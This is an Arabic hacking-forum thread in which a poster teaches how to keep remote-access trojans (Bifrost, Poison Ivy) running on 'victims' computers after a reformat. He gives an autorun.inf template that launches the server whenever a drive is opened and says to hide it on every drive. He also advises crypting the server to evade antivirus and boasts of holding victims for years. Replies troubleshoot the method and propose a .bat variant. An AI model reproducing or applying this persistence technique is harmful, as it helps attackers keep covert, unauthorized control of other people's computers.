بقاء الضحية حتى بعد الفورمات (مجربة)

تم تحميل الصفحة في 0,4931988 ثانية
بقاء الضحية حتى بعد الفورمات (مجربة)
الحالة
مغلق و غير مفتوح للمزيد من الردود.

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
السلام عليكم ورحمة الله وبركاته

اخواني أعضاء الديف بوينت

انا بشرفني اكتب لكم اجمل المواضيع التي تعجبكم

وان شاء الله الموضوع هاد بيعجبكم

بقاء الضحية عندك بلبيفروست او بلبويزون حتى لو عمل فورمات

انا عن نفسي مجربها

وذلك عن طريق

جعل سيرفرك Autorun .......



صنع ملف Autorun بحيث لو فتحت أحد الأقراص الموجوده لدى الضحيه

يشتغل الباتش معها على طول بحيث انك تضع ملف الأوتوران والسيرفر جميعهم في القرص المعني وجعلمهما مخفيان


فثلا لو وضعنا السيرفر بالقرص C


عندما يقوم الضحيه بفتح هذا القرص سوف يتم تشغيل السيرفر تلقائيا ً


بالطبع بديهيا ً غالب العامة يقوم بتنصيب الويندوز على القرص C


وعندما يقوم بعمل فورمات .. سوف يحذف ملف الأوتوران والسيرفر أيضا ً


فلذلك عليك بوضعهم في جميع الدرايفات ( الأقراص ) الموجوده لدى الضحية ( C: D: E: .... ect )



-----------------------------

الطريقة:



المتطلبات:





1-سيرفر مشفر <== حبذا لو كان تشفير شخصي من جميع الحمايات الدارجة وغير مفحوص في مواقع الفحص لضمان بقائه طويل إذا لم يكن أبدياً




2-المفكرة <== مايحتاج




3-كود الأوتوران






تقوم بفتح المفكرة وتلصق بها هذا الكود



كود PHP:


[AutoRun]****lExecute=إسم سرفرك مع الإمتداد**** lopencom mand=إسم سرفرك مع الإمتدادsh e l lexploreco mmand=إسم سرفرك مع الإمتدادopen=إسم سرفرك مع الإمتداد




طبعا اخواني انا وضعت فراغ بين كلمة **** l ope n c om mand

احذفو كل الفراغات الي بلكود راح ارفعلكم اياه على مفكره اذا لم يضبط معكم



فمثلا لو كان اسم سيرفرك server.exe



سيصبح الكود بهذا الشكل




كود PHP:



[
[AutoRun]****lExecute=server.exesh ellopenco mmand=server.exe she ll exploreco mmand=server.exeopen=server.exe​






صور للتوضيح





قم بلصق الكود مع تعديل مايلزم






قم بعمل ( حفظ بإسم )








احفظه بإمتداد inf كما في الصوره









الملف الناتج









قم بوضعه في جميع أقراص الضحية ( C: D: E: ...ect )


ملاحظة اذا لم يضبط الكــود
رفعته على رابط
تحميل


وفي كل مرهـ يقوم الضحيه بفتح احد اقراصه .. يتم تشغيل السيرفر






وانسى أنك تفقدها



ألا ان الله قادر على كل شيء





تحيتي للجميع اخوكم

Dr.ADeeB







ارجو ان يعجبكم الموضوع

لا تبخلو بلتقييم:28:









 
إنضم
13 فبراير 2009
المشاركات
217
الإعجابات
4
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

والله انك بتجي على الجرح يا دكتور اديب والله انا الي شهور ببحث عن هيك طريقة مشكور وجاري التقيم على وزن جاري التحميل هههههههه
 
إنضم
3 يونيو 2008
المشاركات
2,241
الإعجابات
43
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يعطيـك العافيه أخوي دكتور أديب :15:

مع اني مالي بالاختراق بس حبيت ارد لان من جد ابداع يالغالي :15:

أحلى تقيم يالغالي :15:
 

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يسلموو مروركم حبايبي نورتو الموضوع

والي ما زبط معه الكود

هاذ رابط تـحميل

نورتو الموضوع

تحيتي
 

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يسلمووو مرورك اخوي حسون

نورت الموضوع

ومشكور التقييم:13:
 

Bin-Althani

Beginner Developer
rankrankrankrank
إنضم
25 أغسطس 2007
المشاركات
1,400
الإعجابات
95
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

:) يعطيك العافيه
 

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

الله يعافيك نورت
 

Bo-Eid

الله اكبر
rankrankrankrank
إنضم
10 نوفمبر 2007
المشاركات
1,245
الإعجابات
311
النقاط
83
الإقامة
Qatar
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

سلمت يمينك

يبطل اولله انك

ابدعة :9:
 
إنضم
2 أغسطس 2008
المشاركات
5,765
الإعجابات
303
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يعطيك العافيه
 

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يسلمووو مروركم نورتو الموضوع جميعكم:32:
 
إنضم
21 مارس 2009
المشاركات
3,116
الإعجابات
692
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

احلا تقييم يا حبيبي
 

alaa badawi

Beginner Developer
rank
إنضم
7 أبريل 2009
المشاركات
37
الإعجابات
0
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

للأسف الطريقة ما نفعت وطبقتها خطوة خطوة بس لما افتح القرص ما يجي التبليغ
 

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يسلموو مرورك اخوي D.o.h.m.e

اخوي alaa

انا طبقتها وعندي ضحايا الها سنة وسنتين

وكثير نجحت معهم

حاول مره تانية
 
إنضم
8 أكتوبر 2008
المشاركات
1,443
الإعجابات
37
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

تسلم يابعدي على الطريقه :6:
 
إنضم
16 ديسمبر 2007
المشاركات
764
الإعجابات
18
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

شكرن لك دكتور أديب :32:

من خلال خبرتي الطريقة تنفع في البعض وتفشل مع البعض :32:

ايضا السيرفر المكشوف من اهم اسباب عدم نفع الطريقهـ :32:

من خلال تجربهـ ورأي شخصي ... الافضل حفظ الملف الناتج بأمتداد bat وايضا اسمـ السيرفر مهم لنجاح العمليهـ

وايضا في الفترة الاخيرة الكل يعمل فورمات لجميع الاقراص وليس لقرص معين :32:

دمت بود ولكـ جزيل الشكر :32:
 

sam707

Beginner Developer
rank
إنضم
29 يناير 2009
المشاركات
56
الإعجابات
1
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

ياسلام عليك على هالطريقة الخطيرة


الله يوفقك
 
إنضم
18 مارس 2007
المشاركات
2,082
الإعجابات
69
النقاط
48
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

مشكووور اخوي بس ماينفع احطي بدال السيرفر ذا ملف bat ??? :3:
 

Dr.ADeeB

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
23 أغسطس 2008
المشاركات
5,133
الإعجابات
877
النقاط
113
الإقامة
Palestine
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

يسلمووو مروركم حبايبي والله نورتو الموضوع

اخوي ماجد كلامك مضبوط

اهم شيء بلطريقة سيرفر مشفر

وتطبيق وتركيز

والطريقة تضبط على الي يعملون فورمات لقرص واحد او عدة قرص

لكن الي يعمل فورمات لكل الاقراص

ما راح يصل

تحيتي لك نورت الموضوع

اخوي نونخ ولكن

والله نورت الموضوع

اكيد تقدر تحول صيغة الملف الى bat

تحيتي لك
 

b512

Beginner Developer
rank
إنضم
15 فبراير 2009
المشاركات
128
الإعجابات
0
النقاط
0
رد: بقاء الضحية حتى بعد الفورمات (مجربة)

حلو وتسلم يدك على الشرح ..

لكن كيف اخلي السيرفر وملف الأوترون مخفيه في اقراص الضحيه ..؟؟
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل